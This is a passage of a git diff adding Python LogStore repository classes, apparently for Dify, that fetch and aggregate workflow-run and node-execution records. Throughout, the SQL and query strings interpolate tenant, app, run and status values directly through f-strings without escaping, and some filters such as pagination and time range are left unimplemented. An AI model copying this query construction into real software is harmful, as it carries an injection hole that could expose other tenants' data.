protocol after %d attempts: sql=%s", + logstore, + max_retries, + sql, + ) + raise + + # This line should never be reached due to raise above, but makes type checker happy + return [] diff --git a/api/extensions/logstore/repositories/__init__.py b/api/extensions/logstore/repositories/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/extensions/logstore/repositories/logstore_api_workflow_node_execution_repository.py b/api/extensions/logstore/repositories/logstore_api_workflow_node_execution_repository.py new file mode 100644 index 0000000000..8c804d6bb5 --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_api_workflow_node_execution_repository.py @@ -0,0 +1,365 @@ +""" +LogStore implementation of DifyAPIWorkflowNodeExecutionRepository. + +This module provides the LogStore-based implementation for service-layer +WorkflowNodeExecutionModel operations using Aliyun SLS LogStore. +""" + +import logging +import time +from collections.abc import Sequence +from datetime import datetime +from typing import Any + +from sqlalchemy.orm import sessionmaker + +from extensions.logstore.aliyun_logstore import AliyunLogStore +from models.workflow import WorkflowNodeExecutionModel +from repositories.api_workflow_node_execution_repository import DifyAPIWorkflowNodeExecutionRepository + +logger = logging.getLogger(__name__) + + +def _dict_to_workflow_node_execution_model(data: dict[str, Any]) -> WorkflowNodeExecutionModel: + """ + Convert LogStore result dictionary to WorkflowNodeExecutionModel instance. + + Args: + data: Dictionary from LogStore query result + + Returns: + WorkflowNodeExecutionModel instance (detached from session) + + Note: + The returned model is not attached to any SQLAlchemy session. + Relationship fields (like offload_data) are not loaded from LogStore. + """ + logger.debug("_dict_to_workflow_node_execution_model: data keys=%s", list(data.keys())[:5]) + # Create model instance without session + model = WorkflowNodeExecutionModel() + + # Map all required fields with validation + # Critical fields - must not be None + model.id = data.get("id") or "" + model.tenant_id = data.get("tenant_id") or "" + model.app_id = data.get("app_id") or "" + model.workflow_id = data.get("workflow_id") or "" + model.triggered_from = data.get("triggered_from") or "" + model.node_id = data.get("node_id") or "" + model.node_type = data.get("node_type") or "" + model.status = data.get("status") or "running" # Default status if missing + model.title = data.get("title") or "" + model.created_by_role = data.get("created_by_role") or "" + model.created_by = data.get("created_by") or "" + + # Numeric fields with defaults + model.index = int(data.get("index", 0)) + model.elapsed_time = float(data.get("elapsed_time", 0)) + + # Optional fields + model.workflow_run_id = data.get("workflow_run_id") + model.predecessor_node_id = data.get("predecessor_node_id") + model.node_execution_id = data.get("node_execution_id") + model.inputs = data.get("inputs") + model.process_data = data.get("process_data") + model.outputs = data.get("outputs") + model.error = data.get("error") + model.execution_metadata = data.get("execution_metadata") + + # Handle datetime fields + created_at = data.get("created_at") + if created_at: + if isinstance(created_at, str): + model.created_at = datetime.fromisoformat(created_at) + elif isinstance(created_at, (int, float)): + model.created_at = datetime.fromtimestamp(created_at) + else: + model.created_at = created_at + else: + # Provide default created_at if missing + model.created_at = datetime.now() + + finished_at = data.get("finished_at") + if finished_at: + if isinstance(finished_at, str): + model.finished_at = datetime.fromisoformat(finished_at) + elif isinstance(finished_at, (int, float)): + model.finished_at = datetime.fromtimestamp(finished_at) + else: + model.finished_at = finished_at + + return model + + +class LogstoreAPIWorkflowNodeExecutionRepository(DifyAPIWorkflowNodeExecutionRepository): + """ + LogStore implementation of DifyAPIWorkflowNodeExecutionRepository. + + Provides service-layer database operations for WorkflowNodeExecutionModel + using LogStore SQL queries with optimized deduplication strategies. + """ + + def __init__(self, session_maker: sessionmaker | None = None): + """ + Initialize the repository with LogStore client. + + Args: + session_maker: SQLAlchemy sessionmaker (unused, for compatibility with factory pattern) + """ + logger.debug("LogstoreAPIWorkflowNodeExecutionRepository.__init__: initializing") + self.logstore_client = AliyunLogStore() + + def get_node_last_execution( + self, + tenant_id: str, + app_id: str, + workflow_id: str, + node_id: str, + ) -> WorkflowNodeExecutionModel | None: + """ + Get the most recent execution for a specific node. + + Uses query syntax to get raw logs and selects the one with max log_version. + Returns the most recent execution ordered by created_at. + """ + logger.debug( + "get_node_last_execution: tenant_id=%s, app_id=%s, workflow_id=%s, node_id=%s", + tenant_id, + app_id, + workflow_id, + node_id, + ) + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of each record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_node_execution_logstore}" + WHERE tenant_id = '{tenant_id}' + AND app_id = '{app_id}' + AND workflow_id = '{workflow_id}' + AND node_id = '{node_id}' + AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 100 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = ( + f"tenant_id: {tenant_id} and app_id: {app_id} and workflow_id: {workflow_id} and node_id: {node_id}" + ) + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_node_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + return None + + # For SDK mode, group by id and select the one with max log_version for each group + # For PG mode, this is already done by the SQL query + if not self.logstore_client.supports_pg_protocol: + id_to_results: dict[str, list[dict[str, Any]]] = {} + for row in results: + row_id = row.get("id") + if row_id: + if row_id not in id_to_results: + id_to_results[row_id] = [] + id_to_results[row_id].append(row) + + # For each id, select the row with max log_version + deduplicated_results = [] + for rows in id_to_results.values(): + if len(rows) > 1: + max_row = max(rows, key=lambda x: int(x.get("log_version", 0))) + else: + max_row = rows[0] + deduplicated_results.append(max_row) + else: + # For PG mode, results are already deduplicated by the SQL query + deduplicated_results = results + + # Sort by created_at DESC and return the most recent one + deduplicated_results.sort( + key=lambda x: x.get("created_at", 0) if isinstance(x.get("created_at"), (int, float)) else 0, + reverse=True, + ) + + if deduplicated_results: + return _dict_to_workflow_node_execution_model(deduplicated_results[0]) + + return None + + except Exception: + logger.exception("Failed to get node last execution from LogStore") + raise + + def get_executions_by_workflow_run( + self, + tenant_id: str, + app_id: str, + workflow_run_id: str, + ) -> Sequence[WorkflowNodeExecutionModel]: + """ + Get all node executions for a specific workflow run. + + Uses query syntax to get raw logs and selects the one with max log_version for each node execution. + Ordered by index DESC for trace visualization. + """ + logger.debug( + "[LogStore] get_executions_by_workflow_run: tenant_id=%s, app_id=%s, workflow_run_id=%s", + tenant_id, + app_id, + workflow_run_id, + ) + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of each record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_node_execution_logstore}" + WHERE tenant_id = '{tenant_id}' + AND app_id = '{app_id}' + AND workflow_run_id = '{workflow_run_id}' + AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 1000 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = f"tenant_id: {tenant_id} and app_id: {app_id} and workflow_run_id: {workflow_run_id}" + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_node_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=1000, # Get more results for node executions + reverse=False, + ) + + if not results: + return [] + + # For SDK mode, group by id and select the one with max log_version for each group + # For PG mode, this is already done by the SQL query + models = [] + if not self.logstore_client.supports_pg_protocol: + id_to_results: dict[str, list[dict[str, Any]]] = {} + for row in results: + row_id = row.get("id") + if row_id: + if row_id not in id_to_results: + id_to_results[row_id] = [] + id_to_results[row_id].append(row) + + # For each id, select the row with max log_version + for rows in id_to_results.values(): + if len(rows) > 1: + max_row = max(rows, key=lambda x: int(x.get("log_version", 0))) + else: + max_row = rows[0] + + model = _dict_to_workflow_node_execution_model(max_row) + if model and model.id: # Ensure model is valid + models.append(model) + else: + # For PG mode, results are already deduplicated by the SQL query + for row in results: + model = _dict_to_workflow_node_execution_model(row) + if model and model.id: # Ensure model is valid + models.append(model) + + # Sort by index DESC for trace visualization + models.sort(key=lambda x: x.index, reverse=True) + + return models + + except Exception: + logger.exception("Failed to get executions by workflow run from LogStore") + raise + + def get_execution_by_id( + self, + execution_id: str, + tenant_id: str | None = None, + ) -> WorkflowNodeExecutionModel | None: + """ + Get a workflow node execution by its ID. + Uses query syntax to get raw logs and selects the one with max log_version. + """ + logger.debug("get_execution_by_id: execution_id=%s, tenant_id=%s", execution_id, tenant_id) + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of record) + tenant_filter = f"AND tenant_id = '{tenant_id}'" if tenant_id else "" + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_node_execution_logstore}" + WHERE id = '{execution_id}' {tenant_filter} AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 1 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + if tenant_id: + query = f"id: {execution_id} and tenant_id: {tenant_id}" + else: + query = f"id: {execution_id}" + + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_node_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + return None + + # For PG mode, result is already the latest version + # For SDK mode, if multiple results, select the one with max log_version + if self.logstore_client.supports_pg_protocol or len(results) == 1: + return _dict_to_workflow_node_execution_model(results[0]) + else: + max_result = max(results, key=lambda x: int(x.get("log_version", 0))) + return _dict_to_workflow_node_execution_model(max_result) + + except Exception: + logger.exception("Failed to get execution by ID from LogStore: execution_id=%s", execution_id) + raise diff --git a/api/extensions/logstore/repositories/logstore_api_workflow_run_repository.py b/api/extensions/logstore/repositories/logstore_api_workflow_run_repository.py new file mode 100644 index 0000000000..252cdcc4df --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_api_workflow_run_repository.py @@ -0,0 +1,757 @@ +""" +LogStore API WorkflowRun Repository Implementation + +This module provides the LogStore-based implementation of the APIWorkflowRunRepository +protocol. It handles service-layer WorkflowRun database operations using Aliyun SLS LogStore +with optimized queries for statistics and pagination. + +Key Features: +- LogStore SQL queries for aggregation and statistics +- Optimized deduplication using finished_at IS NOT NULL filter +- Window functions only when necessary (running status queries) +- Multi-tenant data isolation and security +""" + +import logging +import os +import time +from collections.abc import Sequence +from datetime import datetime +from typing import Any, cast + +from sqlalchemy.orm import sessionmaker + +from extensions.logstore.aliyun_logstore import AliyunLogStore +from libs.infinite_scroll_pagination import InfiniteScrollPagination +from models.enums import WorkflowRunTriggeredFrom +from models.workflow import WorkflowRun +from repositories.api_workflow_run_repository import APIWorkflowRunRepository +from repositories.types import ( + AverageInteractionStats, + DailyRunsStats, + DailyTerminalsStats, + DailyTokenCostStats, +) + +logger = logging.getLogger(__name__) + + +def _dict_to_workflow_run(data: dict[str, Any]) -> WorkflowRun: + """ + Convert LogStore result dictionary to WorkflowRun instance. + + Args: + data: Dictionary from LogStore query result + + Returns: + WorkflowRun instance + """ + logger.debug("_dict_to_workflow_run: data keys=%s", list(data.keys())[:5]) + # Create model instance without session + model = WorkflowRun() + + # Map all required fields with validation + # Critical fields - must not be None + model.id = data.get("id") or "" + model.tenant_id = data.get("tenant_id") or "" + model.app_id = data.get("app_id") or "" + model.workflow_id = data.get("workflow_id") or "" + model.type = data.get("type") or "" + model.triggered_from = data.get("triggered_from") or "" + model.version = data.get("version") or "" + model.status = data.get("status") or "running" # Default status if missing + model.created_by_role = data.get("created_by_role") or "" + model.created_by = data.get("created_by") or "" + + # Numeric fields with defaults + model.total_tokens = int(data.get("total_tokens", 0)) + model.total_steps = int(data.get("total_steps", 0)) + model.exceptions_count = int(data.get("exceptions_count", 0)) + + # Optional fields + model.graph = data.get("graph") + model.inputs = data.get("inputs") + model.outputs = data.get("outputs") + model.error = data.get("error_message") or data.get("error") + + # Handle datetime fields + started_at = data.get("started_at") or data.get("created_at") + if started_at: + if isinstance(started_at, str): + model.created_at = datetime.fromisoformat(started_at) + elif isinstance(started_at, (int, float)): + model.created_at = datetime.fromtimestamp(started_at) + else: + model.created_at = started_at + else: + # Provide default created_at if missing + model.created_at = datetime.now() + + finished_at = data.get("finished_at") + if finished_at: + if isinstance(finished_at, str): + model.finished_at = datetime.fromisoformat(finished_at) + elif isinstance(finished_at, (int, float)): + model.finished_at = datetime.fromtimestamp(finished_at) + else: + model.finished_at = finished_at + + # Compute elapsed_time from started_at and finished_at + # LogStore doesn't store elapsed_time, it's computed in WorkflowExecution domain entity + if model.finished_at and model.created_at: + model.elapsed_time = (model.finished_at - model.created_at).total_seconds() + else: + model.elapsed_time = float(data.get("elapsed_time", 0)) + + return model + + +class LogstoreAPIWorkflowRunRepository(APIWorkflowRunRepository): + """ + LogStore implementation of APIWorkflowRunRepository. + + Provides service-layer WorkflowRun database operations using LogStore SQL + with optimized query strategies: + - Use finished_at IS NOT NULL for deduplication (10-100x faster) + - Use window functions only when running status is required + - Proper time range filtering for LogStore queries + """ + + def __init__(self, session_maker: sessionmaker | None = None): + """ + Initialize the repository with LogStore client. + + Args: + session_maker: SQLAlchemy sessionmaker (unused, for compatibility with factory pattern) + """ + logger.debug("LogstoreAPIWorkflowRunRepository.__init__: initializing") + self.logstore_client = AliyunLogStore() + + # Control flag for dual-read (fallback to PostgreSQL when LogStore returns no results) + # Set to True to enable fallback for safe migration from PostgreSQL to LogStore + # Set to False for new deployments without legacy data in PostgreSQL + self._enable_dual_read = os.environ.get("LOGSTORE_DUAL_READ_ENABLED", "true").lower() == "true" + + def get_paginated_workflow_runs( + self, + tenant_id: str, + app_id: str, + triggered_from: WorkflowRunTriggeredFrom | Sequence[WorkflowRunTriggeredFrom], + limit: int = 20, + last_id: str | None = None, + status: str | None = None, + ) -> InfiniteScrollPagination: + """ + Get paginated workflow runs with filtering. + + Uses window function for deduplication to support both running and finished states. + + Args: + tenant_id: Tenant identifier for multi-tenant isolation + app_id: Application identifier + triggered_from: Filter by trigger source(s) + limit: Maximum number of records to return (default: 20) + last_id: Cursor for pagination - ID of the last record from previous page + status: Optional filter by status + + Returns: + InfiniteScrollPagination object + """ + logger.debug( + "get_paginated_workflow_runs: tenant_id=%s, app_id=%s, limit=%d, status=%s", + tenant_id, + app_id, + limit, + status, + ) + # Convert triggered_from to list if needed + if isinstance(triggered_from, WorkflowRunTriggeredFrom): + triggered_from_list = [triggered_from] + else: + triggered_from_list = list(triggered_from) + + # Build triggered_from filter + triggered_from_filter = " OR ".join([f"triggered_from='{tf.value}'" for tf in triggered_from_list]) + + # Build status filter + status_filter = f"AND status='{status}'" if status else "" + + # Build last_id filter for pagination + # Note: This is simplified. In production, you'd need to track created_at from last record + last_id_filter = "" + if last_id: + # TODO: Implement proper cursor-based pagination with created_at + logger.warning("last_id pagination not fully implemented for LogStore") + + # Use window function to get latest log_version of each workflow run + sql = f""" + SELECT * FROM ( + SELECT *, ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) AS rn + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND ({triggered_from_filter}) + {status_filter} + {last_id_filter} + ) t + WHERE rn = 1 + ORDER BY created_at DESC + LIMIT {limit + 1} + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore, from_time=None, to_time=None + ) + + # Check if there are more records + has_more = len(results) > limit + if has_more: + results = results[:limit] + + # Convert results to WorkflowRun models + workflow_runs = [_dict_to_workflow_run(row) for row in results] + return InfiniteScrollPagination(data=workflow_runs, limit=limit, has_more=has_more) + + except Exception: + logger.exception("Failed to get paginated workflow runs from LogStore") + raise + + def get_workflow_run_by_id( + self, + tenant_id: str, + app_id: str, + run_id: str, + ) -> WorkflowRun | None: + """ + Get a specific workflow run by ID with tenant and app isolation. + + Uses query syntax to get raw logs and selects the one with max log_version in code. + Falls back to PostgreSQL if not found in LogStore (for data consistency during migration). + """ + logger.debug("get_workflow_run_by_id: tenant_id=%s, app_id=%s, run_id=%s", tenant_id, app_id, run_id) + + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_execution_logstore}" + WHERE id = '{run_id}' AND tenant_id = '{tenant_id}' AND app_id = '{app_id}' AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 100 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = f"id: {run_id} and tenant_id: {tenant_id} and app_id: {app_id}" + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + # Fallback to PostgreSQL for records created before LogStore migration + if self._enable_dual_read: + logger.debug( + "WorkflowRun not found in LogStore, falling back to PostgreSQL: " + "run_id=%s, tenant_id=%s, app_id=%s", + run_id, + tenant_id, + app_id, + ) + return self._fallback_get_workflow_run_by_id_with_tenant(run_id, tenant_id, app_id) + return None + + # For PG mode, results are already deduplicated by the SQL query + # For SDK mode, if multiple results, select the one with max log_version + if self.logstore_client.supports_pg_protocol or len(results) == 1: + return _dict_to_workflow_run(results[0]) + else: + max_result = max(results, key=lambda x: int(x.get("log_version", 0))) + return _dict_to_workflow_run(max_result) + + except Exception: + logger.exception("Failed to get workflow run by ID from LogStore: run_id=%s", run_id) + # Try PostgreSQL fallback on any error (only if dual-read is enabled) + if self._enable_dual_read: + try: + return self._fallback_get_workflow_run_by_id_with_tenant(run_id, tenant_id, app_id) + except Exception: + logger.exception( + "PostgreSQL fallback also failed: run_id=%s, tenant_id=%s, app_id=%s", run_id, tenant_id, app_id + ) + raise + + def _fallback_get_workflow_run_by_id_with_tenant( + self, run_id: str, tenant_id: str, app_id: str + ) -> WorkflowRun | None: + """Fallback to PostgreSQL query for records not in LogStore (with tenant isolation).""" + from sqlalchemy import select + from sqlalchemy.orm import Session + + from extensions.ext_database import db + + with Session(db.engine) as session: + stmt = select(WorkflowRun).where( + WorkflowRun.id == run_id, WorkflowRun.tenant_id == tenant_id, WorkflowRun.app_id == app_id + ) + return session.scalar(stmt) + + def get_workflow_run_by_id_without_tenant( + self, + run_id: str, + ) -> WorkflowRun | None: + """ + Get a specific workflow run by ID without tenant/app context. + Uses query syntax to get raw logs and selects the one with max log_version. + Falls back to PostgreSQL if not found in LogStore (controlled by LOGSTORE_DUAL_READ_ENABLED). + """ + logger.debug("get_workflow_run_by_id_without_tenant: run_id=%s", run_id) + + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_execution_logstore}" + WHERE id = '{run_id}' AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 100 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = f"id: {run_id}" + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + # Fallback to PostgreSQL for records created before LogStore migration + if self._enable_dual_read: + logger.debug("WorkflowRun not found in LogStore, falling back to PostgreSQL: run_id=%s", run_id) + return self._fallback_get_workflow_run_by_id(run_id) + return None + + # For PG mode, results are already deduplicated by the SQL query + # For SDK mode, if multiple results, select the one with max log_version + if self.logstore_client.supports_pg_protocol or len(results) == 1: + return _dict_to_workflow_run(results[0]) + else: + max_result = max(results, key=lambda x: int(x.get("log_version", 0))) + return _dict_to_workflow_run(max_result) + + except Exception: + logger.exception("Failed to get workflow run without tenant: run_id=%s", run_id) + # Try PostgreSQL fallback on any error (only if dual-read is enabled) + if self._enable_dual_read: + try: + return self._fallback_get_workflow_run_by_id(run_id) + except Exception: + logger.exception("PostgreSQL fallback also failed: run_id=%s", run_id) + raise + + def _fallback_get_workflow_run_by_id(self, run_id: str) -> WorkflowRun | None: + """Fallback to PostgreSQL query for records not in LogStore.""" + from sqlalchemy import select + from sqlalchemy.orm import Session + + from extensions.ext_database import db + + with Session(db.engine) as session: + stmt = select(WorkflowRun).where(WorkflowRun.id == run_id) + return session.scalar(stmt) + + def get_workflow_runs_count( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + status: str | None = None, + time_range: str | None = None, + ) -> dict[str, int]: + """ + Get workflow runs count statistics grouped by status. + + Optimization: Use finished_at IS NOT NULL for completed runs (10-50x faster) + """ + logger.debug( + "get_workflow_runs_count: tenant_id=%s, app_id=%s, triggered_from=%s, status=%s", + tenant_id, + app_id, + triggered_from, + status, + ) + # Build time range filter + time_filter = "" + if time_range: + # TODO: Parse time_range and convert to from_time/to_time + logger.warning("time_range filter not implemented") + + # If status is provided, simple count + if status: + if status == "running": + # Running status requires window function + sql = f""" + SELECT COUNT(*) as count + FROM ( + SELECT *, ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) AS rn + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND status='running' + {time_filter} + ) t + WHERE rn = 1 + """ + else: + # Finished status uses optimized filter + sql = f""" + SELECT COUNT(DISTINCT id) as count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND status='{status}' + AND finished_at IS NOT NULL + {time_filter} + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + count = results[0]["count"] if results and len(results) > 0 else 0 + + return { + "total": count, + "running": count if status == "running" else 0, + "succeeded": count if status == "succeeded" else 0, + "failed": count if status == "failed" else 0, + "stopped": count if status == "stopped" else 0, + "partial-succeeded": count if status == "partial-succeeded" else 0, + } + except Exception: + logger.exception("Failed to get workflow runs count") + raise + + # No status filter - get counts grouped by status + # Use optimized query for finished runs, separate query for running + try: + # Count finished runs grouped by status + finished_sql = f""" + SELECT status, COUNT(DISTINCT id) as count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY status + """ + + # Count running runs + running_sql = f""" + SELECT COUNT(*) as count + FROM ( + SELECT *, ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) AS rn + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND status='running' + {time_filter} + ) t + WHERE rn = 1 + """ + + finished_results = self.logstore_client.execute_sql( + sql=finished_sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + running_results = self.logstore_client.execute_sql( + sql=running_sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + # Build response + status_counts = { + "running": 0, + "succeeded": 0, + "failed": 0, + "stopped": 0, + "partial-succeeded": 0, + } + + total = 0 + for result in finished_results: + status_val = result.get("status") + count = result.get("count", 0) + if status_val in status_counts: + status_counts[status_val] = count + total += count + + # Add running count + running_count = running_results[0]["count"] if running_results and len(running_results) > 0 else 0 + status_counts["running"] = running_count + total += running_count + + return {"total": total} | status_counts + + except Exception: + logger.exception("Failed to get workflow runs count") + raise + + def get_daily_runs_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[DailyRunsStats]: + """ + Get daily runs statistics using optimized query. + + Optimization: Use finished_at IS NOT NULL + COUNT(DISTINCT id) (20-100x faster) + """ + logger.debug( + "get_daily_runs_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", tenant_id, app_id, triggered_from + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + # Optimized query: Use finished_at filter to avoid window function + sql = f""" + SELECT DATE(from_unixtime(__time__)) as date, COUNT(DISTINCT id) as runs + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date + ORDER BY date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append({"date": str(row.get("date", "")), "runs": row.get("runs", 0)}) + + return cast(list[DailyRunsStats], response_data) + + except Exception: + logger.exception("Failed to get daily runs statistics") + raise + + def get_daily_terminals_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[DailyTerminalsStats]: + """ + Get daily terminals statistics using optimized query. + + Optimization: Use finished_at IS NOT NULL + COUNT(DISTINCT created_by) (20-100x faster) + """ + logger.debug( + "get_daily_terminals_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", + tenant_id, + app_id, + triggered_from, + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + sql = f""" + SELECT DATE(from_unixtime(__time__)) as date, COUNT(DISTINCT created_by) as terminal_count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date + ORDER BY date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append({"date": str(row.get("date", "")), "terminal_count": row.get("terminal_count", 0)}) + + return cast(list[DailyTerminalsStats], response_data) + + except Exception: + logger.exception("Failed to get daily terminals statistics") + raise + + def get_daily_token_cost_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[DailyTokenCostStats]: + """ + Get daily token cost statistics using optimized query. + + Optimization: Use finished_at IS NOT NULL + SUM(total_tokens) (20-100x faster) + """ + logger.debug( + "get_daily_token_cost_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", + tenant_id, + app_id, + triggered_from, + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + sql = f""" + SELECT DATE(from_unixtime(__time__)) as date, SUM(total_tokens) as token_count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date + ORDER BY date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append({"date": str(row.get("date", "")), "token_count": row.get("token_count", 0)}) + + return cast(list[DailyTokenCostStats], response_data) + + except Exception: + logger.exception("Failed to get daily token cost statistics") + raise + + def get_average_app_interaction_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[AverageInteractionStats]: + """ + Get average app interaction statistics using optimized query. + + Optimization: Use finished_at IS NOT NULL + AVG (20-100x faster) + """ + logger.debug( + "get_average_app_interaction_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", + tenant_id, + app_id, + triggered_from, + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + sql = f""" + SELECT + AVG(sub.interactions) AS interactions, + sub.date + FROM ( + SELECT + DATE(from_unixtime(__time__)) AS date, + created_by, + COUNT(DISTINCT id) AS interactions + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date, created_by + ) sub + GROUP BY sub.date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append( + { + "date": str(row.get("date", "")), + "interactions": float(row.get("interactions", 0)), + } + ) + + return cast(list[AverageInteractionStats], response_data) + + except Exception: + logger.exception("Failed to get average app interaction statistics") + raise diff --git 